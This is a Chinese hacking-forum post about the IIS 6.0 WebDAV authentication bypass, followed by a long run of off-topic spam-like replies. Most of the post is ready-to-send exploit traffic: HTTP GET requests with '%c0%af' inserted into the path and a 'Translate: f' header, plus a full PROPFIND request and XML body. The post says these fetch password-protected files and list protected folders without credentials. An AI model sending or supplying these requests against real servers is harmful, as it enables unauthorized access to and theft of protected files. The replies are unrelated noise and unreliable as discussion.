关灯
开启左侧

[渗透知道] 绕过IIS 6.0 WebDAV的远程身份验证

DeGe 发表于 2013-7-3 17:12:36 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题

漏洞发现者:Nikolaos Rangos
具体漏洞存在于带WebDAV功能的IIS 6.0中
Web服务器没有正确地处理Unicode命令的URI时,解析和发送回的数据.
假设有一个密码保护文件夹d:\inetpub\wwwroot\protected\
此文件夹内有一个名为 protected.zip "
向服务器发送一个HTTP GET请求
GET /  %c0%af/protected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servernameMu
指示Web服务器处理请求使用 WebDAV的
利用这种恶意的URI构建网络服务器发送文件到
/protected/ protected.zip ”而不要求进行适当的验证
另一个有效的请求可能会传送到Web服务器是:

GET /prot%c0%afected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername
IIS 6.0中将会删除„%c0%af” 的请求,并发送回密码保护文件而不验证.
ASP脚本不能下载,除非以这种方式提供服务的脚本源代码是启用的
可以绕过访问限制的,密码保护文件夹和列表,下载,上传和修改文件
Copy code        PROPFIND /protec%c0%afted/ HTTP/1.1
        Host: servername
        User-Agent: neo/0.12.2
        Connection: TE
        TE: trailers
        Depth: 1
        Content-Length: 288
        Content-Type: application/xml
        <?xml version="1.0" encoding="utf-8"?>
        <propfind xmlns="DAV:"><prop>
        <getcontentlength xmlns="DAV:"/>
        <getlastmodified xmlns="DAV:"/>
        <executable xmlns="http://apache.org/dav/props/"/>
        <resourcetype xmlns="DAV:"/>
        <checked-in xmlns="DAV:"/>
        <checked-out xmlns="DAV:"/>
        </prop></propfind>

IIS的回应的目录列表的文件夹中没有要求输入密码

精彩评论14

正序浏览
亮凌庚 发表于 2014-9-28 18:35:19 | 显示全部楼层

怎么就没人拜我为偶像那??

ofbnbaiinfnh 发表于 2014-9-28 18:56:51 | 显示全部楼层

女人啊真是那句话~~~无理占三分~~忘记怎么说了 呵呵 ~~你帮我想想

kwjvtwzx 发表于 2014-9-28 18:58:46 | 显示全部楼层

这篇帖子构思新颖,题材独具匠心,段落清晰,情节诡异,跌宕起伏,主线分明,引人入胜,平淡中显示出不凡的文学功底,可谓是字字珠玑,句句经典,是我辈应当学习之典范(不好意思回错帖了

kjlqiyjws 发表于 2014-9-28 19:11:01 | 显示全部楼层

顶顶多好,大家都来!

kwjvtwzx 发表于 2014-9-28 19:19:41 | 显示全部楼层

我也不知道了~~你把我问蒙了 呵呵

oxdbw 发表于 2014-10-24 18:18:04 | 显示全部楼层

什么什么啊??

uhxidjjr 发表于 2014-10-24 18:37:08 | 显示全部楼层

嘿...反了反了,,,,

xiaoye 发表于 2014-10-24 18:37:24 | 显示全部楼层

哎 我我我怎么办啊??

kwjvtwzx 发表于 2014-10-24 18:53:19 | 显示全部楼层

哥们,给我做个链接吧

爱上空心菜 发表于 2015-2-10 13:38:17 | 显示全部楼层

嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中````````

seazvyt 发表于 2015-2-10 13:39:08 | 显示全部楼层

呵呵 放心 如我算错 你以后来砸我的帖子 呵呵

长颈鹿王77 发表于 2015-2-10 13:40:29 | 显示全部楼层

呵呵 我可不敢~~~~

tohme 发表于 2015-2-10 13:40:53 | 显示全部楼层

我不是来为楼主呐喊加油的,也不是对楼主进行围堵攻击的。